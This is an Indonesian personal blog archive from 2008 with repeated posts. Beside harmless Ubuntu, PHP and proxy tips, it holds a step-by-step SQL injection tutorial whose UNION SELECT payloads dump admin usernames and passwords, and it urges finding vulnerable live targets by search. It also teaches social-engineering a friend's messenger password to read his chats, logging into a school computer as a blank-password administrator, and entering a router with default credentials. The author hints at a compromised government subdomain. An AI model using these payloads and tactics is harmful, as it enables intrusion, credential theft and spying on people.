Kali ini saya hanya ingin sedikit share proxy di hosting saya. Meskipun sudah banyak bertebaran webproxy namun bagi yang ingin aman bisa menggunakan webproxy saya..hehe.
ini link proxynya :
http://www.juniorsev3n.net/tools/proxy/
untuk download bisa di
http://sourceforge.net/project/showfiles.php?group_id=110693
Namun bagi yang tidak suka webproxy saya sedikit share proxy lokal yaitu :
proxies.telkom.net.id:8080
Salam
irfan
Selasa, 30 Desember 2008
Minggu, 21 Desember 2008
Ingin Mempunyai Pengalaman Berlomba
Pengalaman ? Itulah yang saya butuhkan sekarang,karena saat ini saya belum mempunyai jam terbang dalam bidang perlombaan apalagi lomba yang saya ikuti kali dalam membuat web.Saya sendiri dulu sangat menyukai dalam mengedit,menjiplak,dan membuat web.Namun semenjak pemasangan internet kembali saya pun mulai menikmati internet dan mulai lupa dikit-dikit dengan pemrograman seperti php.Dalam database pun demikian,mysql dikit2 lupa tapi untungnya g lupa2 amat. Dan sekarang adalah salat satu pembuktian saya dalam php dan mysql. Saya bergabung di ICT20 dalam mengikuti lomba ini. Lomba ini diadakan oleh dinamik4(Dies Natalies Mahasiswa Ilmu komputer UPI#4 2008) sesuai yang saya ambil dari sitenya di http://lcw.ostric.org/.
Sabtu, 20 Desember 2008
Saat komputer lab di sekolah dibatasi penggunaannya
Ini adalah salah satu pengalaman saya sendiri,setidaknya saya ingin mem-posting artikel dari dulu namun karena banyak sekali masalah barulah saya posting kali ini.Seperti yang saya alami bahwa komputer di laboratorium sekolah memakai dua user,yah tau sendiri memakai sistem operasi bajakan dengan user administrator dan siswa. Memakai user siswa sungguh banyak sekali pembatasannya. Seperti orang seperti saya yang inginnya selalu mendapatkan hak akses paling tinggi. Akhirnya saya gunakan cara yang dulu pernah saya baca, dengan tingkat keberhasilan yang belum pasti. Karena saya sendiri pun belum pernah melakukan cara itu. Dengan komputer lab sekolah sebagai bahan percobaan. Akhirnya saya gunakan cara :
Langkah pertama, pada saat startup wind0w5 xp kan di lab sekolah itu memilih user, antara user admin dengan siswa. Saat itu coba ketikan Control+Alt+Delete,yah seperti banyak di informasi dari artikel2 lain maka akan muncul jendela login yang bisa memasukan user dan password.
Langkah kedua, coba masukan user dengan "administrator" dan password kosongkan saja.
Apabila berhasil itu berarti ada kesalahan dari sang admin atau guru TIK di sekolah,kesalahannya terdapat pada user administrator dibuat dua, yaitu user admin default dan user admin yang dibuat baru. Karena admin default biasanya tidak diberi password. Namun apabila gagal berarti sang admin memakai user admin default dan admin default tersebut diberi password.
Yah cukup sekian tips untuk kali ini.
Salam hangat
irfan
Langkah pertama, pada saat startup wind0w5 xp kan di lab sekolah itu memilih user, antara user admin dengan siswa. Saat itu coba ketikan Control+Alt+Delete,yah seperti banyak di informasi dari artikel2 lain maka akan muncul jendela login yang bisa memasukan user dan password.
Langkah kedua, coba masukan user dengan "administrator" dan password kosongkan saja.
Apabila berhasil itu berarti ada kesalahan dari sang admin atau guru TIK di sekolah,kesalahannya terdapat pada user administrator dibuat dua, yaitu user admin default dan user admin yang dibuat baru. Karena admin default biasanya tidak diberi password. Namun apabila gagal berarti sang admin memakai user admin default dan admin default tersebut diberi password.
Yah cukup sekian tips untuk kali ini.
Salam hangat
irfan
Sabtu, 22 November 2008
Memata-matai lewat shmessenger
Sudah lama saya tidak menulis blog,dan kali ini ada kemauan menulis :D.
Tidak perlu basa-basi kali ini saya hanya ingin menjelaskan sedikit saja.
Tapi cara ini anda memerlukan userid dan password pengguna shmessenger tersebut.Cara mendapatkannya bisa dengan social engineering.Yah contohnya seperti saya ke teman saya yang satu ini.Namanya ricky (hanya contoh).
j : ky,nginjem id sh lah
r : jang naon ?
j : jang ol blegug !
r : ouh
j : yueh id na (kulkas) passna(**)
j : nuhun ah
Padahal tujuan saya sebenarnya bukan untuk online saja.Tapi istilahnya untuk tracking.Maaf juga bahasa yang diatas adalah bahasa sunda.Lanjut..
Setelah mendapatkan userid dan password kita menuju ke website shmessenger.Urlnya http://shmessenger.ro lalu login.
dan akan muncul tampilan seperi ini.
Karena sebelumnya kita belum meng-save message di archive jadi kita setting dulu.klik settings dan ceklis save messages in archive.
Setelah di save kita hanya menunggu waktu:D.Setelah satu hari coba kita buka lagi.
Sekarang setelah login pilih archive dan protokolnya YMSG. Knp YMSG ? yah karena dia pakenya yahoo messenger.:D
Lanjut...
nah itu list yang make id tersebut..ternyata ada id saya juga.hehe:D
sekarang pilih salah satu.Mau yang mana terserah anda.hihi
Nah uda milih salah satu nanti akan ada id-id yang chat dengan id yang dipilih tersebut.
Contohnya
dan dengan begitu berakhir sudah tulisan untuk kali ini.
Salam hangat
juniorsev3n
Tidak perlu basa-basi kali ini saya hanya ingin menjelaskan sedikit saja.
Tapi cara ini anda memerlukan userid dan password pengguna shmessenger tersebut.Cara mendapatkannya bisa dengan social engineering.Yah contohnya seperti saya ke teman saya yang satu ini.Namanya ricky (hanya contoh).
j : ky,nginjem id sh lah
r : jang naon ?
j : jang ol blegug !
r : ouh
j : yueh id na (kulkas) passna(**)
j : nuhun ah
Padahal tujuan saya sebenarnya bukan untuk online saja.Tapi istilahnya untuk tracking.Maaf juga bahasa yang diatas adalah bahasa sunda.Lanjut..
Setelah mendapatkan userid dan password kita menuju ke website shmessenger.Urlnya http://shmessenger.ro lalu login.
dan akan muncul tampilan seperi ini.
Karena sebelumnya kita belum meng-save message di archive jadi kita setting dulu.klik settings dan ceklis save messages in archive.
Setelah di save kita hanya menunggu waktu:D.Setelah satu hari coba kita buka lagi.
Sekarang setelah login pilih archive dan protokolnya YMSG. Knp YMSG ? yah karena dia pakenya yahoo messenger.:D
Lanjut...
nah itu list yang make id tersebut..ternyata ada id saya juga.hehe:D
sekarang pilih salah satu.Mau yang mana terserah anda.hihi
Nah uda milih salah satu nanti akan ada id-id yang chat dengan id yang dipilih tersebut.
Contohnya
dan dengan begitu berakhir sudah tulisan untuk kali ini.
Salam hangat
juniorsev3n
Minggu, 02 November 2008
Connect PPPOE at Ubuntu 8.10
Sebelum tutorialnya saya bercerita sedikit.hehe
Akhirnya upgrade juga dari hardy ke intrepid yang kurang lebih menghabiskan waktu 1 malam lebih. Berawal dari kemarin sore saya menginstall ulang ubuntu 8.04,sebenarnya saya sudah mengupgrade ke intrepid namun ternyata upgrade yang pertama mengalami beberapa gangguan. Saya pun kembali ke awal dan menginstall ubuntu hardy.Maklumlah yang intrepid saya belum pesan. Setelah menghabiskan kurang lebih satu jam akhirnya penginstallan selesai dan langsung saja tanpa basa-basi saya upgrade.Waktu itu kira-kira sore.Karena tidak ada kerjaan,sambil di upgrade saya browsing dan ym-an.Upgradenya terjadi dari sore itu hingga besoknya (sekarang) jam 12 lebih 25 menit.Cukup lamakah ? Wajarlah,bandwidth yang minim tambah browsing dan ym-an pula.
Lanjut,
setelah masuk ke intrepid
buka
netword connections
pilih sub menu DSL
lalu pilih add
ini screenshotnya
klik ok
dan anda akan tersambung
salam
juniorsev3n
Akhirnya upgrade juga dari hardy ke intrepid yang kurang lebih menghabiskan waktu 1 malam lebih. Berawal dari kemarin sore saya menginstall ulang ubuntu 8.04,sebenarnya saya sudah mengupgrade ke intrepid namun ternyata upgrade yang pertama mengalami beberapa gangguan. Saya pun kembali ke awal dan menginstall ubuntu hardy.Maklumlah yang intrepid saya belum pesan. Setelah menghabiskan kurang lebih satu jam akhirnya penginstallan selesai dan langsung saja tanpa basa-basi saya upgrade.Waktu itu kira-kira sore.Karena tidak ada kerjaan,sambil di upgrade saya browsing dan ym-an.Upgradenya terjadi dari sore itu hingga besoknya (sekarang) jam 12 lebih 25 menit.Cukup lamakah ? Wajarlah,bandwidth yang minim tambah browsing dan ym-an pula.
Lanjut,
setelah masuk ke intrepid
buka
netword connections
pilih sub menu DSL
lalu pilih add
ini screenshotnya
klik ok
dan anda akan tersambung
salam
juniorsev3n
Jumat, 31 Oktober 2008
Online YM di web
Bila pusing-pusing cari software buat YM-an anda bisa coba gunakan
http://www.ebuddy.com lalu pilih yahoo buat yang sukanya YM-an. Yang lainnya juga bisa namun saya coba untuk melakukan ym-an. Ketika sudah login makan akan keluar jendela baru .
Dan inilah kira-kira screenshotnya.
nah ebuddy sendiri bisa anda pakai di handphone.
ebuddy sekarang sudah cukup terkenal dan sudah banyak sekali orang-orang yang memakainya. Setelah melihat websitenya pemakai ebuddy mencapai 60.000.000 .Sungguh banyak sekali bukan ? So,kita coba aplikasi ini.
http://www.ebuddy.com lalu pilih yahoo buat yang sukanya YM-an. Yang lainnya juga bisa namun saya coba untuk melakukan ym-an. Ketika sudah login makan akan keluar jendela baru .
Dan inilah kira-kira screenshotnya.
nah ebuddy sendiri bisa anda pakai di handphone.
ebuddy sekarang sudah cukup terkenal dan sudah banyak sekali orang-orang yang memakainya. Setelah melihat websitenya pemakai ebuddy mencapai 60.000.000 .Sungguh banyak sekali bukan ? So,kita coba aplikasi ini.
Senin, 06 Oktober 2008
Tak Sengaja Ku Masuk Ke Router
Hari ini tepatnya hari minggu 5 oktober(Posting tanggal 6).
Internet di rumahku belum jalan juga,tidak tahu apa penyebabnya.
Walau tanpa internet aku pun bermain-main dengan komputerku.
Meskipun tidak ada kerjaan tapi aku mulai mengobrak-abrik komputer,
biasanya pun begitu namun kali ini lebih suka spesifik dan di teliti.
Aku pun masuk ke System.
Inilah yang aku suka,kubuka satu-satu namun tak ada yang lebih menantang.
Sudah kucoba semuanya yang ada di menu system tapi jarang aku teliti dan lihat.
Hanya masuk saja dan mencoba.
Tapi kali ini berbeda,aku mulai klik sana klik sini.
Akhirnya masuk juga ke sub-menu Administrasi.
Karena permasalahannya tidak ada koneksi aku pun masuk ke Program Jaringan.
Sebenarnya aku sudah lama mencoba ini,hanya saja tidak pernah mengutak-atik.
Liat sana liat sini.
Itu yang aku lakukan.
Kulanjutkan masuk ke menu ping.
Karena melihat yang sebelumnya ada IP 192.168.10.2 .
Aku pun ping itu IP,kupikir itu IP ku. Benarkah itu IP ku ?
Untuk master-master maaf bila aku salah,tapi itu hanya perkiraan.
Ah aku pikir tidak ada yang indahnya,lalu kulanjutkan ke netstat.
Dan itulah hasil untuk Routing Table Information.
Lalu aku pilih Active Network Services.
Dan itulah hasilnya.
Satu-satu kucoba akhirnya aku pilih yang terakhir.
Multicast Information.
Itu hasilnya. Terus terang aku tidak mengerti dengan yang kaya ginian.
Aku hanya main-main dan coba aja. Dan Newbie di kaya ginian.
Dari situ aku membaca hasil-hasil dari netstat.
Akhirnya mendapatkan gateway.Yah seumpana pintu gerbang gitu.
Berapakah IP Gateway ? Untuk itu coba liat-liat kembali gambarnya
192.168.10.1 <-Benarkah ? Coba kita coba ke menu yang lainnya
Aku pun masuk ke Traceroute
Yah aku coba masukan IP Gateway.
So ? ini hasilnya .
Yah aku pun masuk lagi ke Port Scan.
Dari namanya saja kita sudah tahu bahwa itu untuk meng-scan port yang dibuka oleh IP tersebut.
Setelah kita scan kita mendapatkan ini.
Dari situ aku tidak melanjutkan ke menu yang lainnya.
Melainkan langsung mencoba masuk ke gateway.
Aku masuk ke Seamonkey,untuk yang belum tahu ini bukan program macem-macem.
Sekedar browser saja.
Ketika masukan addressnya 192.168.10.1
Aku disuruh masukan username dan password.
"Yah" itulah kataku
Kayanya aku sudah malas duluan.
Dari situ aku mulai menebak-nebak.
Pikiranku hanya "Perasaan username ama password default router biasanya admin/1234".
So ? Aku pun mencobanya.
Apa yang terjadi ? Tak kusangka ternyata masuk juga.
Inilah tampilan pertamanya.
Aku pun main-main dengan itu.
Tidak ada yang kuganti-ganti
Aku pun masuk lewat telnet
Aku pun kembali main-main dengan telnet.
Banyak hal baru yang kudapatkan.
Tapi sampai sekarang aku pun belum paham dan mengerti dengan apa yang kutuliskan ini.
Ternyata susah mengatur sebuah jaringan yang securitynya baik.
Tapi justru dari beberapa hal ini aku ingin sekali belajar jaringan.
Semua yang kutuliskan disini pengalaman ku langsung,aku pun langsung menulisnya
sambil melakukan ekspedisi ini.
Ini hanya tulisan,dan semoga ini dapat bermanfaat.
Salam
juniorsev3n
Internet di rumahku belum jalan juga,tidak tahu apa penyebabnya.
Walau tanpa internet aku pun bermain-main dengan komputerku.
Meskipun tidak ada kerjaan tapi aku mulai mengobrak-abrik komputer,
biasanya pun begitu namun kali ini lebih suka spesifik dan di teliti.
Aku pun masuk ke System.
Inilah yang aku suka,kubuka satu-satu namun tak ada yang lebih menantang.
Sudah kucoba semuanya yang ada di menu system tapi jarang aku teliti dan lihat.
Hanya masuk saja dan mencoba.
Tapi kali ini berbeda,aku mulai klik sana klik sini.
Akhirnya masuk juga ke sub-menu Administrasi.
Karena permasalahannya tidak ada koneksi aku pun masuk ke Program Jaringan.
Sebenarnya aku sudah lama mencoba ini,hanya saja tidak pernah mengutak-atik.
Liat sana liat sini.
Itu yang aku lakukan.
Kulanjutkan masuk ke menu ping.
Karena melihat yang sebelumnya ada IP 192.168.10.2 .
Aku pun ping itu IP,kupikir itu IP ku. Benarkah itu IP ku ?
Untuk master-master maaf bila aku salah,tapi itu hanya perkiraan.
Ah aku pikir tidak ada yang indahnya,lalu kulanjutkan ke netstat.
Dan itulah hasil untuk Routing Table Information.
Lalu aku pilih Active Network Services.
Dan itulah hasilnya.
Satu-satu kucoba akhirnya aku pilih yang terakhir.
Multicast Information.
Itu hasilnya. Terus terang aku tidak mengerti dengan yang kaya ginian.
Aku hanya main-main dan coba aja. Dan Newbie di kaya ginian.
Dari situ aku membaca hasil-hasil dari netstat.
Akhirnya mendapatkan gateway.Yah seumpana pintu gerbang gitu.
Berapakah IP Gateway ? Untuk itu coba liat-liat kembali gambarnya
192.168.10.1 <-Benarkah ? Coba kita coba ke menu yang lainnya
Aku pun masuk ke Traceroute
Yah aku coba masukan IP Gateway.
So ? ini hasilnya .
Yah aku pun masuk lagi ke Port Scan.
Dari namanya saja kita sudah tahu bahwa itu untuk meng-scan port yang dibuka oleh IP tersebut.
Setelah kita scan kita mendapatkan ini.
Dari situ aku tidak melanjutkan ke menu yang lainnya.
Melainkan langsung mencoba masuk ke gateway.
Aku masuk ke Seamonkey,untuk yang belum tahu ini bukan program macem-macem.
Sekedar browser saja.
Ketika masukan addressnya 192.168.10.1
Aku disuruh masukan username dan password.
"Yah" itulah kataku
Kayanya aku sudah malas duluan.
Dari situ aku mulai menebak-nebak.
Pikiranku hanya "Perasaan username ama password default router biasanya admin/1234".
So ? Aku pun mencobanya.
Apa yang terjadi ? Tak kusangka ternyata masuk juga.
Inilah tampilan pertamanya.
Aku pun main-main dengan itu.
Tidak ada yang kuganti-ganti
Aku pun masuk lewat telnet
Aku pun kembali main-main dengan telnet.
Banyak hal baru yang kudapatkan.
Tapi sampai sekarang aku pun belum paham dan mengerti dengan apa yang kutuliskan ini.
Ternyata susah mengatur sebuah jaringan yang securitynya baik.
Tapi justru dari beberapa hal ini aku ingin sekali belajar jaringan.
Semua yang kutuliskan disini pengalaman ku langsung,aku pun langsung menulisnya
sambil melakukan ekspedisi ini.
Ini hanya tulisan,dan semoga ini dapat bermanfaat.
Salam
juniorsev3n
Minggu, 07 September 2008
SQL Injection Tutorial Melalui recordID
*mysql
Sebelum membaca artikel ini sebaiknya anda membaca artikel tentang
http://juniorsev3n.blogspot.com/2008/07/script-php-from-dreameaver-8.html
karena ini menerangkan bagaimana sql injection ini bisa terjadi.
Saya beri tahu lagi bahwa bug nya terdapat pada
WHERE id=$recordIDuntuk id itu tidak selalu id tapi tergantung pada sang webmaster.
Langsung aja.
Langkah pertama adalah mengecek bug tersebut.
dengan memberikan tanda single quote ( ' ) di recordID
Semisal :
news.php?recordID=1'Nah apabila tampak pesan error berarti kita bisa melanjutkannya.
Langkah kedua adalah mengecek column yang berada di table tersebut
dengan cara menggunakan perintah ORDER BY
Semisal :
news.php?recordID=1+ORDER+BY+1/*nah apabila nilainya true maka column/field tersebut ada.
artinya kita harus mencari tahu ada berapa nilai yang true !
untuk mencari nilai tinggal ganti saja angka satu tersebut.
Semisal :
news.php?recordID=1+ORDER+BY+2/*Nah apabila nilainya masih true berarti column/field itu ada.Dan apabila nilainya
news.php?recordID=1+ORDER+BY+3/*
sudah false berarti column/field itu tidak ada.Semisal column/field hanya ada 3 saat kita memasukan angka 4 maka akan muncul pesan error di halaman tersebut.
Note : /* adalah tag comment pada SQL dan kita memakai ini untuk tidak mengaktifkan perintah setelah tag comment.
Lain-lain tag comment : // , -- , # ,etc
Langka ketiga adalah menampilkan column/field yang ditampilkan.
dengan menggunakan perintah UNION ALL SELECT
semisal :
news.php?recordID=-1+UNION+ALL+SELECT+1,2,3/*Q : Mengapa harus menggunakan -1 ?
A : tidak selalu -1 tetapi yang nilainya false.
Nah dengan menggunakan perintah itu maka akan keluar nomor2 di halaman.
Itu menandakan nomor2 itulah yang di outputkan.
Dengan demikian kita menggunakan fungsi2 di nomor2 yang dikeluarkan.
semisal nomor yang dikeluarkan adalah 2 dan 3 . Berarti fungsi2 disimpan di nomor 2 dan 3 atau salah satunya. Kalau kita memasukin di nomor yang tidak ditampilkan maka yang diperintahkan tidak akan keluar.
Langkah selanjutnya adalah memberikan fungsi2 mysql.
dengan memberikan version() , user() , database() ,etc
nah untuk mengecek version mysql masukan fungsi version()
untuk melihat user yang digunakan masukan fungsi user()
untuk melihat nama database yang digunakan masukan fungsi database()
Semisal :
news.php?recordID=-1+UNION+ALL+SELECT+1,version(),user()/*Nah di halaman akan menampilkan version mysql dan user nya.
Semisal versionnya 5 keatas dan usernya bebas
Maka kita bisa lanjutkan tetapi apabila versionnya 4 atas 5 kebawah sebaiknya cari target yang lain.
NOTE : apabila usernya root , berbahagialah. karena root adalah user yang tertinggi.Kita bisa menampilkan user2 dan password mysql.Nah selanjutnya adalah menampilkan table2 yang ada.
NOTE : supaya lebih ringkas kita tampilkan saja table2 yang hanya ada di databaseSemisal :
news.php?recorID=-1+UNION+ALL+SELECT+1,group_concat(table_name),3+group_concat adalah fungsi untuk menampilkan semuanya yang ada di column/field itu.
FROM+information_schema.tables+WHERE+table_schema=database()/*
Anda bisa menggunakan fungsi2 lain sesuai kebutuhan. concat(),concat_ws(),etc.
table_name adalah column/field yang terdapat di table tables.
information_shema adalah database tempat penyimpanan data2 skema.
tables adalah table yang bernama tables tempat penyimpanan nama2 table tersebut.
nah dengan demikian di halaman akan muncul nama2 table yang hanya ada di database saja.
untuk menampilkan semuanya anda hanya perlu menghilangkan WHERE table_schema=database()
Apabila terdapat table2 yang berbau tempat penyimpanan database user/admin anda ingat2 nama table itu atau copy paste saja ke Applications->Aksesoris->Penyunting Berkas Teks
hehe,,promosi dikit [ ubuntu 8.04 ]
Nah apabila sudah mendapatkan nama2 table selanjutnya adalah mencari nama2 column/field.
Semisal :
news.php?recordID=-1+UNION+ALL+SELECT+1,group_concat(column_name),3+Nah maka akan menampilkan column/field yang tedapat di database.
FROM+information_schema.columns+WHERE+table_schema=database()/*
Apabila mendapat yang berbau username atau password ya itulah berarti column yang akan kita keluarkan.tetapi apabila sukses dengan menggunakan perintah semisal :
news.php?recordID=-1+UNION+ALL+SELECT+1,group_concat(column_name),3+
FROM+information_schema.columns+WHERE+table_name='user'/*
user adalah contoh table tempat penyimpanan data2 user dan password.
Maka akan keluar column yang berada di table user.
Tapi kalo muncul pesan eror sebaiknya guna cara yang tadi.
Nah apabila kita sudah mendapat nama2 column/field dan table langkah selanjutnya adalah mengeluarkan data username dan password admin.
Semisal :
news.php?recordID=-1+UNION+ALL+SELECT+1,nah maka akan tampil semua data username dan password di table user
group_concat(concat(username,0x3a,password)),3+FROM+user/
Apabila hasilnya enkripsi anda harus mengcracknya dulu
Apabila password nya bukan enkripsi yang berbahagialah karena tidak usah
cape2 mengcracknya.
Sekarang anda tinggal login ke halaman adminnya.
Ya,,mungkin cukup sekian dulu yang bisa saya tulis
mungkin banyak kesalahan dan kekurangan jadi saya mohon maaf.
Correct Me IF I'm Wrong (CMIIW)
hehe
Salam hangat,
juniorsev3n
Selasa, 02 September 2008
Connection PPPoE at Ubuntu 8.04
AH,,akhirnya bisa juga gw konek di ubuntu
Kali ini pengalaman gw yang secara ngasal2 dan akhirnya bisa
Langsung aja
Cara koneksi PPoE di ubuntu :
pertama masuk network setting
trus properties yg gambar telepon
nah isi deh textboxnya
dan ini adalah contohnya
Sesudah setting tersebut kita tinggal konek deh
selese deh...
Salam
juniorsev3n
Kali ini pengalaman gw yang secara ngasal2 dan akhirnya bisa
Langsung aja
Cara koneksi PPoE di ubuntu :
pertama masuk network setting
trus properties yg gambar telepon
nah isi deh textboxnya
dan ini adalah contohnya
Sesudah setting tersebut kita tinggal konek deh
selese deh...
Salam
juniorsev3n
Minggu, 17 Agustus 2008
Memecah date
Memecah date dalam PHP
memecah date disini adalah pemecahan date dalam database(MySql) yg defaultnya
0000-00-00 ke bentuk [ date() ].misalkan 2008-08-08 menjadi 08 August 2008.
Nah untuk memecah itu kita hanya menggunakan fungsi berikut ini:
-list()
-split(string pattern,string string,[int limit])
-date()
-mktime(int hour,int min,int sec,int mon,int day,int year)
Untuk menggunakan fungsi2 diatas ikuti petunjuknya
misalkan variable date dari databasenya $datefromdb
list($tahun,$bulan,$tanggal) = split('[/.-]',$datefromdb)
okeyz kita jelaskan
list($tahun,$bulan,$tanggal)
itu seperti yg defaultnya mysql (0000-00-00)
0 ke 1 sampai 4 adalah tahun jadi kita memecahnya yg asalnya satu variable menjadi 3 variable
0 ke 5 sampai 6 adalah bulan
0 ke 7 sampai 8 adalah tanggal
masing kita pisahkan dan menjadi 3 variable yaitu $tahun,$bulan,$tanggal
nah untuk mengubahnya memakai fungsi date
misalkan
ketika kita print
akan keluar
Friday, August 15th, 2008 12:00 pm
Nah untuk fungsi date bisa dilihat di situs resmi php
dan inilah diantarnya
format Description Example returned values
character
a Lowercase Ante meridiem and Post meridiem am or pm
A Uppercase Ante meridiem and Post meridiem AM or PM
B Swatch Internet time 000 through 999
d Day of the month, 2 digits with leading zeros 01 to 31
D A textual representation of a day, three letters Mon through Sun
F A full textual representation of a month, such as January or March January through December
g 12-hour format of an hour without leading zeros 1 through 12
G 24-hour format of an hour without leading zeros 0 through 23
h 12-hour format of an hour with leading zeros 01 through 12
H 24-hour format of an hour with leading zeros 00 through 23
i Minutes with leading zeros 00 to 59
I (capital i) Whether or not the date is in daylights savings time 1 if Daylight Savings Time, 0 otherwise.
j Day of the month without leading zeros 1 to 31
l (lowercase 'L') A full textual representation of the day of the week Sunday through Saturday
L Whether it's a leap year 1 if it is a leap year, 0 otherwise.
m Numeric representation of a month, with leading zeros 01 through 12
M A short textual representation of a month, three letters Jan through Dec
n Numeric representation of a month, without leading zeros 1 through 12
O Difference to Greenwich time (GMT) in hours Example: +0200
r RFC 822 formatted date Example: Thu, 21 Dec 2000 16:01:07 +0200
s Seconds, with leading zeros 00 through 59
S English ordinal suffix for the day of the month, 2 characters st, nd, rd or th. Works well with j
t Number of days in the given month 28 through 31
T Timezone setting of this machine Examples: EST, MDT ...
U Seconds since the Unix Epoch (January 1 1970 00:00:00 GMT) See also time()
w Numeric representation of the day of the week 0 (for Sunday) through 6 (for Saturday)
W ISO-8601 week number of year, weeks starting on Monday (added in PHP 4.1.0) Example: 42 (the 42nd week in the year)
Y A full numeric representation of a year, 4 digits Examples: 1999 or 2003
y A two digit representation of a year Examples: 99 or 03
z The day of the year 0 through 366
Z Timezone offset in seconds. The offset for timezones west of UTC is always negative, and for those east of UTC is always positive. -43200 through 43200
memecah date disini adalah pemecahan date dalam database(MySql) yg defaultnya
0000-00-00 ke bentuk [ date() ].misalkan 2008-08-08 menjadi 08 August 2008.
Nah untuk memecah itu kita hanya menggunakan fungsi berikut ini:
-list()
-split(string pattern,string string,[int limit])
-date()
-mktime(int hour,int min,int sec,int mon,int day,int year)
Untuk menggunakan fungsi2 diatas ikuti petunjuknya
misalkan variable date dari databasenya $datefromdb
list($tahun,$bulan,$tanggal) = split('[/.-]',$datefromdb)
okeyz kita jelaskan
list($tahun,$bulan,$tanggal)
itu seperti yg defaultnya mysql (0000-00-00)
0 ke 1 sampai 4 adalah tahun jadi kita memecahnya yg asalnya satu variable menjadi 3 variable
0 ke 5 sampai 6 adalah bulan
0 ke 7 sampai 8 adalah tanggal
masing kita pisahkan dan menjadi 3 variable yaitu $tahun,$bulan,$tanggal
nah untuk mengubahnya memakai fungsi date
misalkan
$date=date("l, F jS, Y h:i a",mktime(0,0,0,$bulan,$tanggal,$tahun));
ketika kita print
akan keluar
Friday, August 15th, 2008 12:00 pm
Nah untuk fungsi date bisa dilihat di situs resmi php
dan inilah diantarnya
format Description Example returned values
character
a Lowercase Ante meridiem and Post meridiem am or pm
A Uppercase Ante meridiem and Post meridiem AM or PM
B Swatch Internet time 000 through 999
d Day of the month, 2 digits with leading zeros 01 to 31
D A textual representation of a day, three letters Mon through Sun
F A full textual representation of a month, such as January or March January through December
g 12-hour format of an hour without leading zeros 1 through 12
G 24-hour format of an hour without leading zeros 0 through 23
h 12-hour format of an hour with leading zeros 01 through 12
H 24-hour format of an hour with leading zeros 00 through 23
i Minutes with leading zeros 00 to 59
I (capital i) Whether or not the date is in daylights savings time 1 if Daylight Savings Time, 0 otherwise.
j Day of the month without leading zeros 1 to 31
l (lowercase 'L') A full textual representation of the day of the week Sunday through Saturday
L Whether it's a leap year 1 if it is a leap year, 0 otherwise.
m Numeric representation of a month, with leading zeros 01 through 12
M A short textual representation of a month, three letters Jan through Dec
n Numeric representation of a month, without leading zeros 1 through 12
O Difference to Greenwich time (GMT) in hours Example: +0200
r RFC 822 formatted date Example: Thu, 21 Dec 2000 16:01:07 +0200
s Seconds, with leading zeros 00 through 59
S English ordinal suffix for the day of the month, 2 characters st, nd, rd or th. Works well with j
t Number of days in the given month 28 through 31
T Timezone setting of this machine Examples: EST, MDT ...
U Seconds since the Unix Epoch (January 1 1970 00:00:00 GMT) See also time()
w Numeric representation of the day of the week 0 (for Sunday) through 6 (for Saturday)
W ISO-8601 week number of year, weeks starting on Monday (added in PHP 4.1.0) Example: 42 (the 42nd week in the year)
Y A full numeric representation of a year, 4 digits Examples: 1999 or 2003
y A two digit representation of a year Examples: 99 or 03
z The day of the year 0 through 366
Z Timezone offset in seconds. The offset for timezones west of UTC is always negative, and for those east of UTC is always positive. -43200 through 43200
Sabtu, 09 Agustus 2008
My New Domain
Walau hanya sekedar subdomain tpi berarti banget dehh..
hehehe,,thx untuk pirradoze aka pizzadox619 heuheu dan
juga untuk blank_alpha yg uda masang link gw...
link terbaru gw ini.. dan beberapa subdomain lainnya
*maaf kalo ada yg g aktif
http://juniorsev3n.sman20bandung.sch.id
http://juniorsev3n.madiunkab.go.id-->>wakakakak tau sendiri lah ini uda lama tpi lom di patch
rencananya di subdomain sman20 gw hanya mu masukin shoutbox ,,hihi
dan insya allah nanti gw mu beli domain sendiri..
hihi.doain aje yee
thx
salam hangat
juniorsev3n
hehehe,,thx untuk pirradoze aka pizzadox619 heuheu dan
juga untuk blank_alpha yg uda masang link gw...
link terbaru gw ini.. dan beberapa subdomain lainnya
*maaf kalo ada yg g aktif
http://juniorsev3n.sman20bandung.sch.id
http://juniorsev3n.madiunkab.go.id-->>wakakakak tau sendiri lah ini uda lama tpi lom di patch
rencananya di subdomain sman20 gw hanya mu masukin shoutbox ,,hihi
dan insya allah nanti gw mu beli domain sendiri..
hihi.doain aje yee
thx
salam hangat
juniorsev3n
Rabu, 30 Juli 2008
Script PHP&MYSQL from Dreameaver 8
Ada apa ?
hmmm
[ ini akan berhasil bila magic_quotes_gpc = off dan version 5 ]
Pertama-tama script paketan dari dreameaver 8 ini simple dan cukup aman.
Tapi setelah lama mendalami ternyata setiap manusia pasti mempunyai kesalahan ..
Hehehe
Yah
Setelah masuk
-insert
-Apllication Objects
dan gw coba satu2..
sambil mendalami script tersebut gw coba menganalisis
saat tengah2 coba masuk ke Master Detail Page Set
coba pake id untuk linknya
pasti get defaultnya recordID
otomatis kalau misalkan anda membuat aplikasi berita dan ada detailnya
misalkan yg gw bwt news.php
nah pasti detailnya contohnya
news_detail.php?recordID=[idnya]
itu contohnya
tapi justru get recordID ini yg tidak terfilter dengan baik
misalkan scriptnya seperti ini
Apa yg terjadi ??
okeyzz uda pada tau ??
yoi,,sql injection
dan ruginya kalo version 5,,wuihh haha
untuk sql injection step by step
silahkan liat di milw0rm
ato di mbah google
eh di echo juga ada
ini salah satu links gw yg gw coba di localhost
http://localhost/news.php?recordID=-1 union all select 1,2,version(),user(),database(),concat_ws(username,0x3a,password),7,8 from user--
Ini hanyalah sebuah penelitian
dan gw coba cari di google dgn keyword:
ternyata hasilnya banyak juga
dan carilah yg versi 5 yiahh,,hehe
Dan untuk anda yg kebetulan belum mempatch
caranya mudah sekali,hihi
uda tau function GetSQLValueString di dreamweaver 8 ?
yah pake aja itu kalo masih tetep nyalain magic quotes nya
contoh script nya
untuk id gunakana type int
okeyzzz
CMIIW
untuk lebih lanjut contact me aja
Thx
juniorsev3n
hmmm
[ ini akan berhasil bila magic_quotes_gpc = off dan version 5 ]
Pertama-tama script paketan dari dreameaver 8 ini simple dan cukup aman.
Tapi setelah lama mendalami ternyata setiap manusia pasti mempunyai kesalahan ..
Hehehe
Yah
Setelah masuk
-insert
-Apllication Objects
dan gw coba satu2..
sambil mendalami script tersebut gw coba menganalisis
saat tengah2 coba masuk ke Master Detail Page Set
coba pake id untuk linknya
pasti get defaultnya recordID
otomatis kalau misalkan anda membuat aplikasi berita dan ada detailnya
misalkan yg gw bwt news.php
nah pasti detailnya contohnya
news_detail.php?recordID=[idnya]
itu contohnya
tapi justru get recordID ini yg tidak terfilter dengan baik
misalkan scriptnya seperti ini
$recordID=$_GET['recordID'];
$query_DetailRS1 = "SELECT * FROM hal WHERE id = $recordID";
Apa yg terjadi ??
okeyzz uda pada tau ??
yoi,,sql injection
